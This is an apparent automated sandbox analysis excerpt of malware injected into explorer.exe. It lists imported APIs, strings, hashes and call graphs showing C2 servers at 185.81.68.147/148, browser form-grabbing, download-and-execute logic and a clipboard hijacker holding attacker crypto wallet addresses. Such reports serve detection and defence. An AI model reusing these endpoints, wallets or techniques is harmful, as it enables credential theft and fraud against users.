                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                  • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                  • API String ID: 2683923594-1492645186
                                                                                                                                                                  • Opcode ID: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
                                                                                                                                                                  • Instruction ID: c795681c620f7dddcb3fabe99ffe4de0638db3ea435fbe1a600badedd1d750cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 8d59903077919d75a48de8f6b3917833d6ddf00dddff58a82a888e902bab9895
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E034B38619F4185EB82CF42F88839533A9F74BB95F419226C88E4B727EF79C198D744

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                  • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                  • API String ID: 3240663557-1393645298
                                                                                                                                                                  • Opcode ID: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
                                                                                                                                                                  • Instruction ID: 20045af85c5eff8b477fedb2341332ad28d4bf733d65548d34da081ac6636fd4
                                                                                                                                                                  • Opcode Fuzzy Hash: 99ad222673ba694320bb615da2a5c6662173702eac1b7259930a67c36a373a93
                                                                                                                                                                  • Instruction Fuzzy Hash: A5C15132608B5586EB50DF26EC5479A77A1F78AB88F819125DE4E87B28DF3CC14DCB40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 386 98272c0-9827384 call 98350a0 lstrcpyA lstrcatA * 5 389 98273e0-982742e lstrcatA WSAStartup 386->389 390 9827386-982738a 386->390 392 9827434-982744f call 9860820 389->392 393 98278b5 389->393 390->389 391 982738c-98273da lstrcatA call 9860718 lstrcatA * 2 390->391 391->389 396 98278bc 392->396 400 9827455-9827462 call 9860828 392->400 393->396 399 98278bf-98278c5 free 396->399 401 98278cb-982791e closesocket WSACleanup call 983e010 399->401 400->396 406 9827468-98274a8 memcpy htons call 9860838 400->406 406->396 409 98274ae-98274d3 lstrlenA send 406->409 409->396 410 98274d9-98274e0 409->410 411 98274e2-98274f4 send 410->411 412 98274fa-9827531 call 98350a0 410->412 411->396 411->412 415 9827540-982755b call 9860848 412->415 415->396 418 9827561-9827564 415->418 419 982767a-9827689 418->419 420 982756a-9827573 418->420 419->396 422 982768f-9827694 419->422 420->419 421 9827579-9827582 420->421 421->419 423 9827588-982758f 421->423 422->415 424 9827925-982792a call 983e648 423->424 425 9827595-98275a3 423->425 426 98275a5-98275bb lstrcmpiA 425->426 427 98275ca-98275df lstrlenA 425->427 426->396 429 98275c1-98275c5 426->429 430 98275e5-98275fb call 98607f8 427->430 431 9827699-98276a0 427->431 433 9827676 429->433 444 9827674 430->444 445 98275fd-9827616 lstrcmpiA 430->445 434 98276a2-98276a4 431->434 435 98276ac-98276ae 431->435 433->419 434->396 437 98276aa 434->437 438 98276b4-98276e8 malloc 435->438 439 982784c-982784f 435->439 437->438 443 98276f0-982770f call 9860848 438->443 441 9827851-982786c malloc 439->441 442 982789c-98278b3 malloc 439->442 446 9827870-9827883 call 9860848 441->446 442->401 443->399 455 9827715-9827717 443->455 444->433 448 9827618-9827636 call 9860808 445->448 449 982763e-9827650 lstrcmpiA 445->449 454 9827889-982788b 446->454 448->396 460 982763c 448->460 449->444 450 9827652-9827670 lstrcmpiA 449->450 450->444 454->396 457 982788d-9827892 454->457 458 982781e-9827820 455->458 459 982771d-9827725 455->459 457->446 462 9827894-982789a 457->462 461 9827823-982782a 458->461 459->458 463 982772b-9827733 459->463 460->444 461->443 465 9827830 461->465 462->401 463->458 464 9827739-9827740 463->464 466 9827746-9827778 call 9860808 464->466 467 982791f-9827924 call 983e648 464->467 465->399 466->399 472 982777e-9827780 466->472 467->424 472->399 473 9827786 472->473 474 9827835-9827847 473->474 475 982778c-9827798 473->475 474->401 476 98277b2-98277b8 475->476 477 982779a-98277ae realloc 475->477 478 98277c0-98277de call 9860848 476->478 477->476 478->399 481 98277e4-98277e8 478->481 481->478 482 98277ea-9827803 call 9860848 481->482 482->399 485 9827809-982781c 482->485 485->461
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4277384649-0
                                                                                                                                                                  • Opcode ID: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
                                                                                                                                                                  • Instruction ID: b4bfea369d2e606b1e17596a4251fd6e183f4c4f8205d8d67079ad4fd06b5d47
                                                                                                                                                                  • Opcode Fuzzy Hash: ac0048a8c1b97b5be37f734cf37a3f7532f8c13e2c97d188fb481249bfdad725
                                                                                                                                                                  • Instruction Fuzzy Hash: F1F1D372305A818AEB30DF27E8443AA77A1F759B89F44A129CA4FCBB15DF78D184C744

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 09835282
                                                                                                                                                                  • InternetCrackUrlA.WININET ref: 09835297
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcpyA.KERNEL32 ref: 0982731E
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982732F
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827343
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827357
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827368
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982737C
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 0982739A
                                                                                                                                                                    • Part of subcall function 098272C0: wsprintfA.USER32 ref: 098273B2
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273C6
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 098273DA
                                                                                                                                                                    • Part of subcall function 098272C0: lstrcatA.KERNEL32 ref: 09827416
                                                                                                                                                                    • Part of subcall function 098272C0: WSAStartup.WS2_32 ref: 09827426
                                                                                                                                                                    • Part of subcall function 098272C0: socket.WS2_32 ref: 09827442
                                                                                                                                                                    • Part of subcall function 098272C0: gethostbyname.WS2_32 ref: 09827459
                                                                                                                                                                    • Part of subcall function 098272C0: memcpy.MSVCRT ref: 09827479
                                                                                                                                                                    • Part of subcall function 098272C0: htons.WS2_32 ref: 09827488
                                                                                                                                                                    • Part of subcall function 098272C0: connect.WS2_32 ref: 0982749F
                                                                                                                                                                    • Part of subcall function 098272C0: lstrlenA.KERNEL32 ref: 098274B5
                                                                                                                                                                    • Part of subcall function 098272C0: send.WS2_32 ref: 098274CB
                                                                                                                                                                  • PathFindFileNameW.SHLWAPI ref: 0983531C
                                                                                                                                                                  • GetTempPathW.KERNEL32 ref: 09835336
                                                                                                                                                                  • GetTempFileNameW.KERNEL32 ref: 0983534C
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0983535C
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 09835368
                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 09835391
                                                                                                                                                                  • WriteFile.KERNEL32 ref: 098353B6
                                                                                                                                                                  • free.MSVCRT ref: 098353C5
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 098353CE
                                                                                                                                                                  • ShellExecuteW.SHELL32 ref: 098353FC
                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0983540B
                                                                                                                                                                  • free.MSVCRT ref: 09835416
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                  • String ID: open
                                                                                                                                                                  • API String ID: 3619236930-2758837156
                                                                                                                                                                  • Opcode ID: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
                                                                                                                                                                  • Instruction ID: 5c41375c2fa41e059c57cfd29230835921fcfd28047722367ed0b958f949c216
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad832edc24f0e499001a067034fa4c443532b192f0a6fea87c3cbcc4a0b7810
                                                                                                                                                                  • Instruction Fuzzy Hash: A8518472714A5086FB14CF66E85439E77A0F789B88F849429EE4E87B58DF78C149CB40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 09835629
                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 09835643
                                                                                                                                                                    • Part of subcall function 0982F480: WideCharToMultiByte.KERNEL32 ref: 0982F4C3
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 0983566C
                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0983567D
                                                                                                                                                                  • wsprintfA.USER32 ref: 098356CD
                                                                                                                                                                    • Part of subcall function 09829450: EnterCriticalSection.KERNEL32 ref: 09829498
                                                                                                                                                                    • Part of subcall function 09829450: RtlInitializeCriticalSection.NTDLL ref: 098294A5
                                                                                                                                                                    • Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294DA
                                                                                                                                                                    • Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294FD
                                                                                                                                                                    • Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982950D
                                                                                                                                                                    • Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982951D
                                                                                                                                                                    • Part of subcall function 09829450: LeaveCriticalSection.KERNEL32 ref: 098295A4
                                                                                                                                                                    • Part of subcall function 09829450: memcpy.MSVCRT ref: 098295BC
                                                                                                                                                                    • Part of subcall function 09829450: lstrlenA.KERNEL32 ref: 098295CA
                                                                                                                                                                  • free.MSVCRT ref: 098356E1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                  • String ID: 2.1
                                                                                                                                                                  • API String ID: 2800961625-2188894714
                                                                                                                                                                  • Opcode ID: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
                                                                                                                                                                  • Instruction ID: c092b957021d974c44aed12b4905d2e4fd8c86de89c70cf81871c5867b0a3d1f
                                                                                                                                                                  • Opcode Fuzzy Hash: 548dfce6f61ac98489f05572c49c3bf2591e801de7b04bdd32ccd213bb45216d
                                                                                                                                                                  • Instruction Fuzzy Hash: 5741B132614A80DAE720CF76E8543DE77B5F789788F809009EA4D87B58DF79C249CB41

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 849 98288b0-98288dd call 983bfbc 852 98288e3-98288f3 call 983bfd4 849->852 853 98289b6-98289cd call 983e010 849->853 856 98288f8-98288fa 852->856 858 9828900-9828905 856->858 859 98289ad-98289b0 call 9850040 856->859 860 9828990-98289a7 Thread32Next 858->860 861 982890b-9828915 call 98501a0 858->861 859->853 860->858 860->859 861->860 865 9828917-9828921 call 98501a8 861->865 865->860 868 9828923-9828929 865->868 869 9828951-9828957 868->869 870 982892b-982894d HeapAlloc 868->870 872 9828980-982898d 869->872 873 9828959-9828973 call 9850190 869->873 870->859 871 982894f 870->871 871->872 872->860 873->859 876 9828975-982897d 873->876 876->872
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3234909527-0
                                                                                                                                                                  • Opcode ID: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
                                                                                                                                                                  • Instruction ID: 522c56270222ab0fc899c77acd8d23392cff9ec936b2f3b6be75dc4e6a227ae5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8feb2644561010b961152437857cd8564b3064406f8d9a6e20686534e0cc2a88
                                                                                                                                                                  • Instruction Fuzzy Hash: 41314332208A4186EF24CF25E454319B3A1F789B98F48C219DB9D87759DF38C185CF52
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2622297391-0
                                                                                                                                                                  • Opcode ID: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
                                                                                                                                                                  • Instruction ID: f19f4bc42f4a8aaab5898a56f21ab348bb794eb63bb6afababed509ac94be4f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 9376aa2f0c253af331e9382ad1490ff95537631666a6fae9671663dacc052423
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F319E21706B6486EF118F23E41036AA7A1F759FD4F488139EE4D8BB58EF3CD4818740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcmpi$Create$FileNameThread$CloseFindHandleModuleMutexPath
                                                                                                                                                                  • String ID: brave.exe$browser.exe$chrome.exe$explorer.exe$firefox.exe$msedge.exe$opera.exe$rbNSpGEsyb
                                                                                                                                                                  • API String ID: 936357808-3480109235
                                                                                                                                                                  • Opcode ID: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
                                                                                                                                                                  • Instruction ID: 59a50caca33d6386b049cfa383da2209b87fbb048ed75049e7c17fc0394c4a9c
                                                                                                                                                                  • Opcode Fuzzy Hash: ca7cf2f7333e9c74630c9c8955ded9afe126b29924dd5ef945dd6746575d4bbb
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C415160210A0181EB54EF76F8507AE2394FB86784F85F029D94FC6769EF7DC148C792

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 568 982f2e0-982f321 CreateFileW 569 982f323-982f32f 568->569 570 982f330-982f370 GetFileSize call 9850058 HeapAlloc 568->570 573 982f372-982f38d ReadFile 570->573 574 982f3b0-982f3b8 call 9850040 570->574 575 982f399-982f3ad call 9850058 HeapFree 573->575 576 982f38f-982f397 573->576 582 982f45c-982f478 574->582 575->574 576->575 578 982f3bd-982f3df 576->578 583 982f3e1-982f3f6 call 982eee0 578->583 584 982f44b-982f459 call 9850040 578->584 589 982f401-982f42e call 9850058 HeapAlloc 583->589 590 982f3f8-982f3fd 583->590 584->582 589->584 594 982f430-982f447 call 983cf80 589->594 590->583 591 982f3ff 590->591 591->584 594->584
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3250796435-0
                                                                                                                                                                  • Opcode ID: a570c59ff07c8582ff7f9362800e75dde1297c6a14a7e496a45d1ca199ab8740
                                                                                                                                                                  • Instruction ID: a53f27f7cd4bc50ee96639e13906edc746763095c0950efb720ddfb2cb993077
                                                                                                                                                                  • Opcode Fuzzy Hash: a570c59ff07c8582ff7f9362800e75dde1297c6a14a7e496a45d1ca199ab8740
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E418036300B5187EB50CF26E84876A77A4FB89B95F558129DF9E93B54EF38C089CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0982F040: GetWindowsDirectoryW.KERNEL32 ref: 0982F093
                                                                                                                                                                    • Part of subcall function 0982F040: GetVolumeInformationW.KERNEL32 ref: 0982F0E2
                                                                                                                                                                    • Part of subcall function 0982F040: wsprintfW.USER32 ref: 0982F144
                                                                                                                                                                  • SHGetFolderPathW.SHELL32 ref: 0982F1D5
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0982F1E5
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0982F1F3
                                                                                                                                                                  • CreateDirectoryW.KERNEL32 ref: 0982F1FE
                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 0982F20C
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0982F21C
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0982F22A
                                                                                                                                                                  • lstrcatW.KERNEL32 ref: 0982F23A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                  • Opcode ID: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
                                                                                                                                                                  • Instruction ID: afc5690ab2a24c539ed2fe54bdbd0f6e66bcd2cceaf301f4a491210a7b6ca08d
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C210F32319F4286EA90DF25F85875E33A1F78AB84F42A435DA9E87715EE39C118CB40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 606 9837540-983756a call 9837b90 609 9837570-98375a6 call 9837af0 call 9822c20 call 9837430 call 9837c20 606->609 618 983760b-9837638 call 9822c20 call 9837430 call 9837c20 609->618 619 98375a8-9837606 call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 609->619 632 983763a-9837698 call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 618->632 633 983769d-98376ca call 9822c20 call 9837430 call 9837c20 618->633 619->618 632->633 653 983772f-983775c call 9822c20 call 9837430 call 9837c20 633->653 654 98376cc-983772a call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 633->654 674 98377c1-98377ee call 9822c20 call 9837430 call 9837c20 653->674 675 983775e-98377bc call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 653->675 654->653 695 9837853-9837880 call 9822c20 call 9837430 call 9837c20 674->695 696 98377f0-983784e call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 674->696 675->674 716 9837882-98378e0 call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 695->716 717 98378e5-9837912 call 9822c20 call 9837430 call 9837c20 695->717 696->695 716->717 737 9837977-98379a4 call 9822c20 call 9837430 call 9837c20 717->737 738 9837914-9837972 call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 717->738 758 98379a6-9837a04 call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 737->758 759 9837a09-9837a36 call 9822c20 call 9837430 call 9837c20 737->759 738->737 758->759 779 9837a9b-9837aa0 call 9850068 759->779 780 9837a38-9837a96 call 9821100 call 9822c20 call 9837430 call 9837c90 call 9822c20 call 9837ce0 call 9821200 759->780 785 9837aa6-9837aaf call 9821200 779->785 780->779 785->609
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 09837AF0: OpenClipboard.USER32 ref: 09837B01
                                                                                                                                                                    • Part of subcall function 09837AF0: GetClipboardData.USER32 ref: 09837B13
                                                                                                                                                                    • Part of subcall function 09837AF0: GlobalLock.KERNEL32 ref: 09837B24
                                                                                                                                                                    • Part of subcall function 09837AF0: GlobalUnlock.KERNEL32 ref: 09837B35
                                                                                                                                                                    • Part of subcall function 09837AF0: CloseClipboard.USER32 ref: 09837B3B
                                                                                                                                                                    • Part of subcall function 09837CE0: GlobalAlloc.KERNEL32 ref: 09837D08
                                                                                                                                                                    • Part of subcall function 09837CE0: GlobalLock.KERNEL32 ref: 09837D1F
                                                                                                                                                                    • Part of subcall function 09837CE0: GlobalUnlock.KERNEL32 ref: 09837D37
                                                                                                                                                                    • Part of subcall function 09837CE0: OpenClipboard.USER32 ref: 09837D3F
                                                                                                                                                                    • Part of subcall function 09837CE0: EmptyClipboard.USER32 ref: 09837D45
                                                                                                                                                                    • Part of subcall function 09837CE0: SetClipboardData.USER32 ref: 09837D53
                                                                                                                                                                    • Part of subcall function 09837CE0: CloseClipboard.USER32 ref: 09837D59
                                                                                                                                                                  • Sleep.KERNEL32 ref: 09837AA0
                                                                                                                                                                  Strings
                                                                                                                                                                  • XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 09837A38
                                                                                                                                                                  • LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK, xrefs: 0983775E
                                                                                                                                                                  • TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq, xrefs: 098376CC
                                                                                                                                                                  • rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 09837914
                                                                                                                                                                  • bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 098377F0
                                                                                                                                                                  • DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 098379A6
                                                                                                                                                                  • 0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0983763A
                                                                                                                                                                  • 1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 098375A8
                                                                                                                                                                  • addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 09837882
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
